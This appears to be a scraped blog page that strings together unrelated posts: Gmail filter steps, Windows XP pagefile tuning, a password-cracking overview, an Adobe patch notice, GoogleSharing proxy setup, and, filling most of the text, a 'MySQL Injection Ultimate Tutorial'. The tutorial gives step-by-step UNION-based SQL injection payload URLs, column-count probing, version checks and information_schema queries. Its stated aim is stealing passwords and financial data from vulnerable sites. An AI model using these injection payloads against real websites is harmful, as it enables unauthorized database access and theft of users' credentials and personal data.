   4. Select one or more actions from the list. These actions will be applied to messages matching your filter criteria in the order in which the actions are listed -- for example, you could choose to Forward matching messages to a specific email address, then Delete the messages. Note that if you choose to forward messages to another address, you'll need to first verify that you own any new forwarding addresses.
   5. If you'd like to apply this filter to messages already in Gmail, select the Also apply filter to x conversations below checkbox.
   6. Click Create Filter.

Please note: When you create a filter to forward messages, only new messages will be affected. Any existing messages that the filter applies to will not be forwarded.

To create a filter from within a message:

   1. Click the drop-down menu next to Reply.
   2. Select Filter messages like this.
   3. Enter your filter criteria in the appropriate field(s).

To edit or delete existing filters:

   1. Click Settings (at the top-right of any Gmail page).
   2. Click Filters.
   3. Find the filter you'd like to change and click its edit link, or click delete to remove the filter.
   4. If you're editing the filter, enter the updated criteria for the filter in the appropriate fields, and click Next Step.
   5. Update any actions and click Update Filter.

You can create an unlimited number of filters, but only 20 filters can forward to other addresses. You can maximize your filtered forwarding by combining filters that send to the same address.

readmore...

optimizing windoz pagefile ?

Default Optimizing windows pagefile

    he page file (virtual memory) is the part of your hard drive that the Operating System uses as though it were main memory. The OS uses virtual memory when the physical memory cannot hold the data that the application requires it to. Since hard drives are much slower as compared to RAM, accessing data from virtual memory is slower and there is naturally a significant effect on system performance. Moreover, Windows XP uses the virtual memory all the time, regardless of free physical memory, so optimization of the page file is essential for a faster system.

    There are two important aspects to the page file -its size and its location.

    Page File size

    Windows XP uses the page file dynamically, that is the page file grows or shrinks according to need. The page file is often given a minimum value and a maximum value, where the minimum value defines the guaranteed space allocated to the page file and the maximum value defines the limit to which the page file can grow. With a maximum and minimum value set, Windows XP has to resize the page file on the fly. Setting the maximum and minimum value to the same number results in more efficient handling of the page file, since Win XP won’t have to waste time resizing the page file.
    Setting the size of the page file

    Go to the ‘System Properties’ page. Here, go to the ‘Advanced’ tab and then select ‘Settings’ under ‘Performance’. In the window that opens, go to the ‘Advanced’ tab; towards the bottom of the tab, you will find ‘Virtual memory settings’. Click ‘Change’.

    In the next window that opens, you can select the drive on which you want the page file to reside; by default, the page file resides on the C: drive. You can also see the page file size. To change it, click on ‘Custom Size’ and then key in the initial and maximum sizes to be the same. Typically, 1 GB of page file is more than enough for most users, so key in ‘1024′ as your initial and maximum page file size.

    Page File Location

    Keeping the page file on the same drive as the Operating System is not advised, as the page file requires intermittent read and write cycles that can significantly affect the performance of the system. Those who have only one drive can place the page file on a non OS partition.

    Once in the virtual memory settings you can see all your partitions listed in the box. Select the drive on which to enable the page file, then select ‘Custom Size’, and key in ‘1024′ as your initial and maximum page file size.

readmore...

Are You Sure Your Password is Safe?

Since the appearance of computers and the necessity of storing confidential information, passwords became part of our lives. But password hacking programs also appeared; as a ready to offer a solution for those hackers who were stopped by this barrier. At first, these programs were distributed between certain underground hacker groups.

    But when the internet appeared, anyone could find programs for password hacking; passwords hackers popularized few softwares and soon it became mainstream among the computer community. Any user can insert the keywords 'how to hack a password' in any search engines and he will find tons of information that can help him.
Passwords and How to Obtain Them
A password is a combination of characters that a user uses for protecting information. Once a file or a determined section of a hard disk is protected by a password, only those that know it can access it. Although passwords have existed for thousands of years, they have adapted perfectly to the computer era.

        If you consider how much money you can make for knowing the correct combination of characters of a determined portal, then it is no wonder that password hackers proliferated.
How Hacking Of Passwords Is Achieved
Password hacks can be performed in several ways. The most common used tool is social engineering. Social engineering consists in making a user believe that he is giving confidential information to a trusted party. For example, a cracker could pose as a system administrator from another country and ask for some personal information that could be considered irrelevant by the user. It's quite probable that that information was the last piece of the puzzle required by the cracker for acquiring the password of the user.

Another way of hacking passwords is through a hash function. A hash function is a program that transforms a determined password into a fixed length string. For example, if you have the password foxtrot1256, the hash function will transform it into a key, something like DG65HKSDLK43545SSDFEE232AQQQ10. Some programs use determined artifices for finding the password hidden inside the key.

Since computing power increased, the brute force attack became another choice for cracking passwords. How does it work? Well, it basically tests different kinds of character combinations until it finds the correct one. The problem with this method is that if the password is too long, then the brute force attack won't prosper, at least during a reasonable spam of time. In this kind of situations, it is better to use social engineering to find out the password.

readmore...

Adobe warns against third party patches ?

Adobe warns against third party patches

Earlier this month, Adobe warned users about yet another security vulnerability in Acrobat – but then they issued another warning, cautioning users against installing “fixes” issued by third parties such as the one from security company RamzAfzar. Because it was out there before the release of the official patch from Adobe, many users and IT pros might consider installing it to get immediate protection, but it’s important to realize that third party patches aren’t going to be supported by Adobe, and may possibly cause more problems than they solve. In the meantime, one solution is to use an alternative PDF program. Read more here:

http://www.pcworld.com/article/205603/adobe_warns_acrobat_users_dont_install_thirdparty_security_patch.html

readmore...

Google Sharing ?

GoogleSharing is a special kind of anonymizing proxy service, designed for a very specific threat. It ultimately aims to provide a level of anonymity that will prevent Google from tracking your searches, movements, and what websites you visit. GoogleSharing is not a full proxy service designed to anonymize all your traffic, but rather something designed exclusively for your communication with Google. Our system is totally transparent, with no special "alternative" websites to visit. Your normal work flow should be exactly the same.
The Basic Problem

Google thrives where privacy does not. If you're like most internet users, Google knows more about you than you might be comfortable with. Whether you were logged in to a Google account or not, they know everything you've ever searched for, what search results you clicked on, what news you read, and every place you've ever gotten directions to. Most of the time, thanks to things like Google Analytics, they even know which websites you visited that you didn't reach through Google. If you use Gmail, they know the content of every email you've ever sent or received, whether you've deleted it or not.

They know who your friends are, where you live, where you work, and where you spend your free time. They know about your health, your love life, and your political leanings. These days they are even branching out into collecting your realtime GPS location and your DNS lookups. In short, not only do they know a lot about what you're doing, they also have significant insight into what you're thinking.

Where GoogleSharing Comes In

GoogleSharing is a system that mixes the requests of many different users together, such that Google is not capable of telling what is coming from whom. GoogleSharing aims to do a few very specific things:

   1. Provide a system that will prevent Google from collecting information about you from services which don't require a login.
   2. Make this system completely transparent to the user. No special websites, no change to your work flow.
   3. Leave your non-Google traffic completely untouched, unredirected, and unaffected.

The GoogleSharing system consists of a custom proxy and a Firefox Addon. The proxy works by generating a pool of GoogleSharing "identities," each of which contains a cookie issued by Google and an arbitrary User-Agent for one of several popular browsers. The Firefox Addon watches for requests to Google services from your browser, and when enabled will transparently redirect all of them (except for things like Gmail) to a GoogleSharing proxy. There your request is stripped of all identifying information and replaced with the information from a GoogleSharing identity.

This "GoogleShared" request is then forwarded on to Google, and the response is proxied back to you. Your next request will get a different identity, and the one you were using before will be assigned to someone else. By "sharing" these identities, all of our traffic gets mixed together and is very difficult to analyze.

The GoogleSharing proxy even constantly injects false but plausible search requests through all the identities.

The result is that you can transparently use Google search, images, maps, products, news, etc... without Google being able to track you by IP address, Cookie, or any other identifying HTTP headers. And only your Google traffic is redirected. Everything else from your browser goes directly to its destination.
GoogleSharing Transport

Where Google has failed to provide universal HTTPS support, we have. All requests to a GoogleSharing proxy are sent via HTTPS. These eventually have to be proxied out as HTTP from GoogleSharing to Google, but your traffic is encrypted on the first path.
Running A GoogleSharing Proxy

We've made the proxy code available so that anyone can run a GoogleSharing proxy instance in addition to the one that we're running.


The basic GoogleSharing install is fairly straightforward:

   1. Download the GoogleSharing Firefox Addon.
   2. Restart Firefox.
   3. You are now browsing with GoogleSharing! All of the appropriate Google traffic will be redirected through a GoogleSharing proxy.
   4. By default, GoogleSharing is enabled. To toggle the GoogleSharing status, simply left-click on the green text that says "GoogleSharing Enabled" in the bottom right hand corner of your browser window.
   5. Should you feel the urge,

Customizing Your Settings
Each GoogleSharing proxy you have configured can be customized with your language preferences, services to exclude, and transport requirements.

   1. Right-click on the "GoogleSharing Enabled/Disabled" text in the bottom right hand corner of your browser window, and select "Options".
   2. Select the GoogleSharing proxy you would like to configure (by default there is only one, the proxy we run at proxy.googlesharing.net), and click "Edit Proxy".
   3. If there are services that you would not like to anonymize with GoogleSharing, you can select the ones you would like to exclude under "Do not proxy the following services." Note that this is in addition to the services that GoogleSharing will never proxy, such as Mail, Checkout, Health, Sites, Docs, and Reader.
   4. If you would like the Google interface language to be something other than English, you can select the language of your choice under "Google Interface Language."
   5. If you would like to restrict the languages that appear in your search results, you can select all of those that you'd like to accept.
   6. If you don't care about your traffic between your browser and the GoogleSharing proxy being SSL protected, you can unselect "Use SSL" for a slight speedup.

Changing The Default Proxy
If someone else starts running a GoogleSharing proxy that you would prefer to use, simply right-click on the GoogleSharing status in the bottom right of your browser window, and select "Options." Here you can add new GoogleSharing proxies and configure which GooogleSharing proxy is currently enabled.

Running Your Own Proxy
If you have access to some server resources and would like to run a public GoogleSharing proxy, you can download the server here: googleshare v0.14

To install the proxy:

    * wget http://www.googlesharing.net/server/googleshare-0.14.tar.gz
    * sudo apt-get install python-twisted-web python-openssl python-psyco
    * tar zxvf googleshare-0.14.tar.gz
    * cd googleshare-0.14
    * sudo python setup.py install

To run the proxy on SSL port 443 and HTTP port 80:

    * sudo googleshare -c <sslCertificateLocation> -k <sslKeyLocation> -s 443 -p 80

The proxy will drop privileges once it has bound to specified ports and opened its log file.

To stop the proxy, send it SIGINT (kill -2 <pid>) and it will save its identity state, which will automatically be restored the next time the proxy starts. Sending the proxy SIGKILL (kill -9 <pid>) will not give it the chance to save state.


Source :http://www.googlesharing.net/download.html

readmore...

MySQL Injection Ultimate Tutorial ?

Section 1 - Intro to Basic Database Information

Section 2 – Steps to injections

1)Find out how to close the previous statement & find the right comment to use to end the injection

2)Check for magic quotes

3)Check to see if UNION works

4)Find the number of columns

5)Craft a union statement that doesnt cause an error and see which columns are outputted

6)Check the mysql version to see if information_schema is present

7)Get the desired column and table names

8)Get your data


In Part 2: (not done yet)

Section 1 – Advanced injections

1)Check for load_file()

2)Check for into outfile

3)Ddos the mysql server

4)login page injections

5)Possible failures - multi selects

6)Get past magic quotes - where, concat - no load_file

7)The no spaces bug

8)Getting past filters

9)Blind Injection

10)Advanced NOT IN


Before we start anything about inserting SQL commands and stealing data from columns and tables, we need to discuss the basics and all the terms that will be necessary for fully comprehending this paper. So lets begin this with some basic Database Server Info. By the end of this section you should fully understand the basics of databases and how they function on a user interaction level.
Quote:Section 1: Basic Database Information

Database(DB) Servers are servers that hold information. Information is stored in a type of holder called database, which is a certain section of the database that serves as a structured container that stores data in fully organized subsections which enable the quick and efficient withdrawal or insertion of data..

DB Servers can have many databases, each with a different use, such as web, which may hold content displayed or needed for the correct display of webpages open to the public, or intranet, which may include information needed by employees on the inside network of the company, etc. There are many types of database servers, but all are similar which few differences. Some common types are:

1)Mysql
2)MsSQL (Microsoft SQL Server)

3)Oracle

4)Microsoft Access

5)Postgre SQL

etc..

In this tutorial we will discuess one of the two most common, MySql (the other most common is MsSQL, then after that Microsoft Access).

DB's are made up of tables, each which hold a similar type of data such as user info or articles.Tables are made up of columns, which group the data into different types such as usernames, passwords, dates registered, etc.The actual data in a table is in a row, which are inserted into the database and have info for each column in the table - e.g. a username, password, etc


Now, to access data from the server you would use SQL - Standard Query Language. This is similar to programming languages in that it has its own set of functions, operators, and syntax. This lets you select certain data that you want and choose the database, table, and columns that you want to access the rows in.

SQL has a set format for selecting data from the database. It looks like this:

SELECT column1,column2 FROM table

This is basically saying to go to table “table” and gets the data stored in columns “column1” and “column2” for all the rows (since the number is not specified, it takes them all. Ill show you how to specify how many next) .

But what if you only wanted two rows? Yes, you could still retrieve all the rows then sort it out with commands in php, but that’s inneficient. Say you wanted the FIRST 2 usernames & passwords from table users of database webinfo (for injections you usually dont have to put the database, its already selected in the code)You would use

Select column_name FROM table_name limit start,number

column_name is the columns you want. if you want two columns, you would do column1,column2.

table_name is the table. If you want to use a table from a different datbase server, you would do database.table

limit start,number tells the server how many rows you want. Say you want the first 2 rows, you would make start 0 (the first row), and put number 2 for two rows. This would basically say go to the first row (0) and give me the next two rows.

If you wanted the next 2 rows after the first two (but only two, not all 4), you would make start 2 since you already got 2 and make number 2 again. (limit 2,2). This would be saying go to the second row and get me the next two rows. If you wanted all four, youwould make start 0 and number 4.

For injections you dont need to know how to get the data out of the query result in php/asp, which usually involve manipulating the arrays returned by the mysql query, since its already done for you in the code of the script youre trying to hack. You just need to find which columns get displayed to the page, which we will discuss later.

Now, say you want to get the password of a user whose username is "bako123". This is used for login systems to check logins. Then you would use:

Select column_name FROM table_name WHERE column_name = 'Value'

For example, if you wanted to the password column from the table users in a row where the username column is bako123 you would do:

Select password FROM users WHERE username = 'bako123'

This would let you retrieve the password of a certain user, bako123. This can be used in many ways, to retrieve a certain article, user information, a certain persons financial information, etc.

If you wanted to get the password of a user where the name was similar to bako, maybe xbako or bakos or xbakos, you would do

Select password FROM users WHERE username LIKE '%bako%'

The % is a wildchar which basically says there can be text in its place, so in this case there can be text before and after bako since there is a % before and after it.

This leads us to the final discussion in this section: Magic Quotes.

Many database servers (or scripts that access them) have magic quotes enabled. This takes quotes like ', which are needed to specify data like for statements like WHERE username = or in functions we will discuss later that load files with a certain filename. Quotes are needed to specify strings. For example, when we did WHERE username LIKE ‘%bako%’, the quotes told the server that the string to search for was %bako%. If there were no quotes, the server wouldn’t take %bako% as a string, and not only would the search fail but the script would return an error because %bako% is out of place.

Magic Quotes prevents quotes from being used in injections by either making the ' (original quote) to \' (backslashed quote) or '' (double quote).


The \' tells the sql server to take away the meaning of the ' and regard it as a normal character in a string. For example, say you wanted to select a password from a user that had a username Bako's. If you did :

Select password FROM users WHERE username = 'bako's'

the ' in bako's would end the username = value statement and make it WHERE username = 'bako'. Then the s' would be stray and cause an error.

So to sepcify that the ' isnt part of the SQL query syntax but just a normal character in a string like the letter b, you can use \ to take its meaning away and make it be considered a normal character by the server.

Another way the server takes the meaning away from ' is by making it ''. Say you wanted to find a user by the name of bako's again, and you put bako's straight into the script, like

Select password FROM users WHERE username = 'bako's'

the script/server would change it to

Select password FROM users WHERE username = 'bako''s'

which would then create two different strings, bako and s, and since the s is out of place and not in a statment( like SELECT col FROM table WHERE col = value) or function it would cause an error too. There is a way to get around this in certain cases, and it will be discussed later. Now that you know basic info on mysql, time to start Injecting!!
Quote:Section 2: SQL Injecting to Steal Data

In this section we will cover each of the steps to succesfully exploiting SQL Injection vulnerabilities in web scripts that use mysql. We will go step by step and cover each part thoroughly. By the time you finished this section you should fully understand how to take advantage of SQL Injection vulnerabilities and be able to succesfully retrieve data such as usernames, passwords, financial information, and other assorted confidential data from databases that are used by vulnerable scripts. Well start from the very beginning of determining if the script is vulnerable or not.

Subsection 2.1: Check for Injections

So say you find a script like this and you want to see if its vulnerable to SQL Injection:

http://site.com/script.php?id=1

In order to further demonstrate how this works, lets say you do know what query the script forms (which is usually very unlikely in real-world injections). Lets say it looks like this:

Select title,data FROM news WHERE id =

What that would do is get the title and data info from the news table in a row where the column id was 1.

So, what if we added some sql commands to the id in the url? Like this:

http://site.com/script.php?id=1'

The output depends on the script’s quality. If the script filters the input for sql keywords, or converts the id value to an integer so the keywords don’t get through, or takes any other precaution to ensure that you cant insert sql statements into the query, then no sql error would be returned, and the page will either load normally or give you a warning like “Attack Spotted, Your IP Address has been recorded “ or something similar. However, if the script had no filtering whatsoever and just got the user data for id straight from the URL and inserted it right into the MySQL Query, then you would get an error like this:

"MySQL Syntax Error By '1'' In file script.php On Line 7."

Then you would know that the server does NOT filter input to make sure there are no sql commands/syntax in it and DOES NOT make sure the data is only an integer. Since you got an error, you are SURE that this is SQL Injectable!

Keep in mind that now all sites has errors as verbose as this, some sites have simple errors like “INTERNAL ERROR” or “ERROR” that reveal no useful data. However, you can be reasonably sure that its injectable. To be fully sure, move on to the next step. If all the possibilities fail in the next step, then you now chances are that’s not an sql error but some other type of error.

Now That you have found out its injectable, lets go step by step through my MySQL Injection outline.


Subsection 2.2 - Step 1)Find out how to close the previous statement.

To do this we will use an SQL operator "and". This word lets you specify two criterias that the row must match when searching the table. For example, if you have a WHERE clause, such as

Select user from users where password = 'pass123'

and want to select data not only where the password is 'pass123' but also where the email is 'email@m.com', you would use somethings like this:

Select user from users where password = 'pass123' AND email = 'email@m.com'

This basically tells the server, as we had before, select the data from the user column in a row in table users where the password is pass123 AND the email also is email@m.com. If both of these criteria are not matched, then the script moves on to the next row.

Another operator like AND is OR. An example:

Select user from users where password = ‘pass123’ OR email = ‘email@m.com’

This basically says, instead of making sure the column password is pass123 AND the email is email@m.com, it searches for rows where the password is pass123 or the email is email@m.com. Both don’t have to be present for the row to be chosen. One will do, even if the other doesn’t equal the right value.

Now say you added an and 1=1 to any statment, it would load since 1 always equals 1. This can be very useful from an attackers point of view. It can help us find out how to close the previous query AND can help us to determine is magic quotes are enabled.

Lets say you dont know the query, as you wont in most cases. The query could be anything like:

Select user from users where id = '1'

or

Select user from users where id = (1)

or
Select user from users where id = 1

etc...

In order to add more SQL commands to steal our data (***s, usernames, passwords, etc)we need to be able to end the where id = 1 (or '1', (1), etc). To do that we would have to try different possibilities until we get NO error.

In order to add our command, we would also need to know how to get rid of the other data that will come after our injection. For example, if the query was like this:

Select user from users where id = '1'

and we did http://site.com/script.php?id=1' and 1=1 (lets say magic quotes are OFF)

the query would become
Select user from users where id = '1' or 1=1 '

The stray ' after 1=1, which is left over from the '1' before we added our commands, needs to be taken care of or it will cause an error. To do this, we need to use comments to comment out the rest of the code. Two comment operators are /* and --. Sometimes one will cause an error, in that case try the other.

So lets have an full example for this first step in injections.

Say the script was, as i said before:

http://site.com/script.php?id=1

First we would check if its injectable:

http://site.com/script.php?id=1'

It gives - "Error in MySQL Syntax by '1'' in script.php on line 7."

Now you know its injectable. Now lets try to see how to end the WHERE clause.

http://site.com/script.php?id=1 or 1=1 --

This would work if there was no ' surrounded 1, like in

SELECT title FROM news where id = 1

This gives the error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."

Remember, MySQL always surrounds the problem part in the query, in this case 1’ or 1=1 --, with quotes, so don’t let the beginning and end quotes confuse you.

Even though the error shows you that 1 has a ' after it (by '1' or 1=1 --') we will pretend we didnt notice (not all sites have errors like this anyway).

So we would try next

http://site.com/script.php?id=1 or 1=1 /*

same error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."

Now lets try ending it with '. so lets do:

http://site.com/script.php?id=1' or 1=1 /*

now we get the error - "Error in MySQL Syntax by '/*'. in script.php on line 7."

This would show us that either /* isnt supported or this sql server is configured so that it needs a */ to close the comment, which would defeat the purpose of commenting out the code. But since it doesnt give us an error about the ' after id=1, we know were close. So we try the next comment opertaor:

http://site.com/script.php?id=1' or 1=1 --

The page loads normally!!! Now we know we need to end the where clause with ' and add -- to the end to add our sql commands!!

Now we move on to the next step:



Subsection 2.3 - Step 2)Check for magic quotes

We know from our example before that magic quotes are off because we used ' to end the WHERE clause and it gave no error, but lets pretend our first try worked, http://site.com/script.php?id=1 or 1=1 --, so were not sure if ‘ causes an error or not. We need to know if magic quotes is on because if we want to use a function like load_file to steal files (discussed later), or choose data where the user = 'admin', we need to be able to use 's, so magic quotes MUST be off.

To find out if theyre on, we would try:

http://site.com/script.php?id=1 or '1'='1' --

If you get an error like:

"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."

or
"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."

then you would see that magic quotes are on since its adding \s or an extra ' to the ' you put in. Then you would not be able to steal files if load_file was enabled or choose certain data using WHERE ( there is a way to get around it which I will discuss later, but it doesnt work for load_file, just WHERE and other functions discussed later like concat)

Now if you get no error, you know magic_quotes are off and you have an even bigger advantage. That was easy, wasn’t it? Now lets move on.


Subsection 2.4 - Step 3)Check to see if UNION works

UNION is a function in sql that lets us select more data in a single sql statement. This can be very useful since we need to use it in order to select our own data that we want to steal from the database such as passwords or financial data. To illustrate its use further, heres an example. Say the query was:

SELECT user from users where pass = 'pass'

we could do
SELECT user from users where pass = 'pass' UNION select email from emails limit 0,1

And no error would be displayed. You don’t need to know how it helps get data to the page etc since its not needed to get the injection working.

However, in order to get the data from the UNION SELECT displayed, we would need to make sure the first select statement displays no data at all.If the first select statement does return data, it will overwrite the data from the UNION. We will discuss this later. Also, it is always good to use UNION ALL instead of just UNION, it can prevent type mismatch errors.

Now, UNION is only availabe in mysql server versions above 3 (4,5,6 - 6 is the latest, but 5 is most popular). So in order to steal our data, we need to use union (well, we could use blind injection, but thats a pain in the ass), and in order to use union, the mysql version MUST be > 3.

There is a way to check for the mysql version without union ( 1 and (substr(@@version, 1)>3 )- but its more advanced than the general tone of this tutorial at the moment (ill go over it in a bit), so we will use an easier way. This is to try a union select and judge the error. So we could try:

http://site.com/script.php?id=1' UNION ALL SELECT 1 --

If you get an error like :

"Error in MySQL Syntax by 'UNION'. in script.php on line 7."

Then you know that the server is not understanding what UNION is since its getting an error at the UNION keyword. If you got an error like:

"MySQL Error: Select statements must have the same number of columns in script.php on line 7."

Then you know union worked since it realizes that both selects don’t have the same number of columns, therefore showing that it reads two selects, where ones the original and one our union. Even If we got a different error such as a type conversion, as long as its not saying an error by UNION its ok. For some errors that just show “INTERNAL ERROR” or something similar, it’s a good idea to try the next method.

So, if there arent error messages like this, and just errors like INTERNAL ERROR, then you can use

http://site.com/script.php?id=1' and substr(@@version,1)>3 --

Substr is a function that takes a certain character from a string. @@version gives us the mysql version in a string. So say @@version returned 4.1.33-log, subtr would get the 1st letter in it (the ,1 in substr(@@version,1)), which is 4. Then it checks if 4 is greater than 3 (the >3 part). If it is, the page loads normally. If it doesnt, the page will load with no data (you can get a blank page, or a page with the basic template but no actual data, e.g. no title for the news and no actual news).

Now if UNION works, were in business! Time to move on! if not, you can use blind injection, which will be briefly discussed later in Part 2.



Subsection 2.5 - Step 4)Find the number of columns

This section will fix this error we got before- "MySQL Error: Select statements must have the same number of columns in script.php on line 7.". In order to actually use UNION to steal data, we must make union work first with no error at all so the page can load and display the stolen data.

This error occured because the initial SELECT statement and the UNION ALL SELECT statement we injected had a different number of columns.Whenever you have UNION SELECT (or UNION ALL SELECT), the number of columns must ALWAYS match the number of columns in the first SELECT statement, or you’ll get an error. For example, if the query looked like this:

Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email FROM emails

You will get that error since the first select is selecting two columns (user and pass) while the UNION ALL SELECT is selecting only one (email). So if you did

Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email,id FROM emails

There wouldnt be an error and the query would execute succesfully since the first select statement is selecting two columns (user and pass) and the second select, the union all select, is also selecting two columns (email and id).

Now to get the number of columns in the first select statment, we can do two things:

1) guess the number of columns till you get it right. For example

http://site.com/script.php?id=1' UNION ALL SELECT null --

(null is a data type that means empty. If you used 1 or 'the' - or in other words, an integer or string, you might get a type mismatch error)

If you get an error like "MySQL Error: Select statements must have the same number of columns in script.php on line 7." then you move on to

http://site.com/script.php?id=1' UNION ALL SELECT null,null --

and continue adding a ,null (an extra column) to the URL until you get no error. Then count the nulls and thats the number of columns!

2) use order by - this is WAY easier.

ORDER BY is a statement in SQL that tells the database server how to order the result. For example, if you did

SELECT title,data FROM news WHERE id=1 ORDER BY news ASC


the server would order the all the output in alphabetical order from a-z. If you changed ASC to DESC it would make it z-a.

The server automatically sees if the column is a string or integer. if its a string, it goes alphabetically, and if its an integer, numerically.

ORDER BY also selects numbers instead of columns. The number is the number of the column in the select statement. For example, if the query waas this:

SELECT title,data FROM news WHERE id=1 ORDER BY 1 ASC

It would choose the first column chosen in the query, which is title (it chooses from title, data). Then it orders the result alphabetically from a-z.

If it was
SELECT title,data FROM news WHERE id=1 ORDER BY 2 ASC

It would use the second column selected, data, and order it by that.

So we can take advantage of this and try numbers from 1 on in the URL. Once we hit an error saying that the column is invalid, we know that the last number to NOT give an error is the number of columns. Heres an example:

http://site.com/script.php?id=1' ORDER BY 1 -- no error

http://site.com/script.php?id=1' ORDER BY 2 -- no error

http://site.com/script.php?id=1' ORDER BY 3 -- no error

http://site.com/script.php?id=1' ORDER BY 4 -- error - "MySQL Error: No column number '4' in WHERE clause in script.php on line 7."

So we know that 3, the last number to not give an error, is the number of columns in the first select!

Now lets move on to the next step!


Subsection 2.6 - 5)Craft a union statement that doesnt cause an error & see which columns are outputted

So now that we know the number of columns, we need to make a union statement and see which columns are outputted to the site so we know which columns we can use to retrieve and output our data to the screen. This is generally a two step process.

1)First we craft the union select statement( rememer to use union all) which numbers as the columns. An example:


http://site.com/script.php?id=1' UNION ALL SELECT 1,2,3 --

If there is no error, you look at the screen and check which numbers are displayed in the place data would normally be put (for example, in the place where the article title would be, check if a number is there).

If the numbers are on the screen, you know you can use the columns with those numbers to display stolen data. The other columns that arent displayed are useless.

For example, if you see the number 2 in the title of the page and a number 3 where the article is usually displayed, you know that you can use the second and third column (where you put the 2 and 3 in the union all select 1,2,3 --) to display data you will steal from the database to the page.

Now if you get an error when you use all numbers like: "MySQL Error: Cant convert int in script.php on line 7." then you know that one column cant be a number, so you should move to step 2.

2)Since we know that we cant go all out and put all integers, we need to use null. Null never causes a type conversion error since its just an empty data holder. So we try:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

Now if you can an error, there is a good chance the script has TWO select statements. For example, first it can do

SELECT title,data,author FROM news WHERE id= '[your data from the url]'

then in a later line in the script it uses the id value from the url again in another select statement like this:

SELECT data,time FROM news WHERE id= '[your data from the url]'

Now, the first select statment would be like this:

SELECT title,data,author FROM news WHERE id= '1' UNION ALL SELECT null,null,null --

but the second will be

SELECT date,time FROM news WHERE id = '1' UNION ALL SELECT null,null,null --

This would cause an error since the second query has ONLY TWO columns in the first select statement (time,year), while the union all select has THREE columns. This will cause another error saying select statement need the same number of columns. Now if you change the UNION ALL SELECT to have two nulls, then the first select would cause an error.


Unfortunately, there is no way around this in mysql at the moment. (in mssql there is, however). A good way to double check that its a multi select and not that you messed up the number of columns in the UNION select statement is to cause an error like we did before, doing

http://site.com/script.php?id=1'

Say you got an error like this:

"MySQL Syntax Error By '1'' In file script.php On Line 7."

Then do the union all select url like this:

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

say you get an error like this:

"MySQL Error: Select statements must have the same number of columns in script.php on line 18."

Now look at the two errors. The first is on line 7, and the second on line 18. Now that you know that two separate lines of code caused the error, you know that two separate queries caused the error and it is infact a multi select, which you cant get around.

Keep in mind that not all sites have errors that verbose. Some just say "error". Then you would have to double check the columns and make sure you didnt make a mistake.

So lets say there is no multi select. We left off at :

http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --

Now there is no error. So we try this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,null,null --

We check for two things: an error, and if no error is displayed, check if the number 1 is displayed on the page in a place it wasnt before, like the title or where the news or author would be.

Say you get the same error as before in step 1:

"MySQL Error: Cant convert int in script.php on line 7."

Then you know that the first column causes an error, and you should ignore it and switch it back to null.

If it happens that all the columns cause errors or arent displayed on the page, you can come back and test it with 'test' instead of 1 and see if it displays text or still gives a conversion error. If you get no error AND the word test is displayed on the page, you can then go further and get usernames/passwords and any other text based data, but not data that are integers like dates and ***s.


So now that we know 1 causes an error, we move on and check column two after we switch 1 back to null.

http://site.com/script.php?id=1' UNION ALL SELECT null,2,null --

Now look at the screen. Lets say there is an error. So now we know that 2 also causes an error and cant be used.

So lets change 2 back to null and try 3.

http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --

and guess what - no error! now check the page for the number 3. Check any places such as the title bar in your browser and places where data was like where the news was orthe author or date. If you dont find anything, dont give up, make the number unique like 1232323132 and view the source and see if its displayed in any hidden tags.

If its not displayed, as i said before, you can go back to the other two and try strings like 'test' (as long as magic quotes are disabled, or your getting around them like i will explain later), and check if those are displayed.

So now we are left with:

http://site.com/script.php?id=1’ UNION ALL SELECT null,null,3 –

and we know we can use the 3rd column to display our stolen data! So lets move on to step 6:


Subsection 2.7 - Step 6)Check the mysql version to see if information_schema is present

This is an easy step!
Information_Schema is a part of the database that holds ALL of the table names and column names stored in that database. You can access it like any other table.

To get tables, you would use information_schema.tables like this:

select table_name from information_schema.tables

This would return all of the tables that exist in the database.

To get columns you would use information_schema.columns

select column_name from information_schema.columns

This would return all the column names in all the tables of the database.

Information_schema.columns also holds the table names, so you can switch column_name with table_name and use it to get tables too.

Now this luxury is only available in mysql version 5 and up (6). So to make sure we can use it, we need to use the @@version command to check the version. So lets take our url and change 3 with @@version.

http://site.com/script.php?id=1' UNION ALL SELECT null,null,@@version --

Now, check where the 3 was before to see the version.

If the version is like 4.0.22-log, then the mysql version is 4 and you cant use information_schema.tables, but if its 5.0.1, then you can use information_schema.tables! You can also use the substring method I described before.

Now lets move on to step 7:

Subsection 2.8 – Step 7) Retrieve the desired columns

If the version is aboveor equal to 5, we can scan information_schema for password (or ***, etc) columns. If not, we have to guess and use clues given to us in errors to find prefixes, tables and columns that we want to steal data from. So for the first part lets assume that information_schema is enabled.

Now we need to scan information_schema for columns that are similar to pass, password, user_pass, etc. ( you can change it around so it will be ***, address, phone number, etc)

So, we need to use information_schema.columns and the LIKE operator along with wildchars (%) as i discussed in the basic info section.

So if we were putting queries straight into the db server, it would look like this:

SELECT column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'

(of course, magic quotes will have to be off. If they're on, you will learn how to get past them later on)

For our vulnerable site, it would look like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' –

The LIKE ‘%pass%’ is telling the server to scan make sure column_name has a value that is similar to “pass” and can have text before and after it (the wildchars). So it could be pass, userpass, password, etc.

This will return the first column_name that is like pass, with text before and after it (from the wildchars before and after it).

Now say you want the table_name the columns in so you can access it with union. You would simply change column_name to table_name like this:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' --

Now say you dont like this first column/table, and you want to see if theres a second. There are two ways we can do this. The first is with limit (which i explained in the basic info section). So you would add limit 0,1 at the end which saying get 1 result starting from the 0th (first for humans, 0 for computers) result.

Then after you get the column/table, to move on you would do limit 1,1 then limit 2,1 etc until it runs out of columns. Heres an example:

http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --

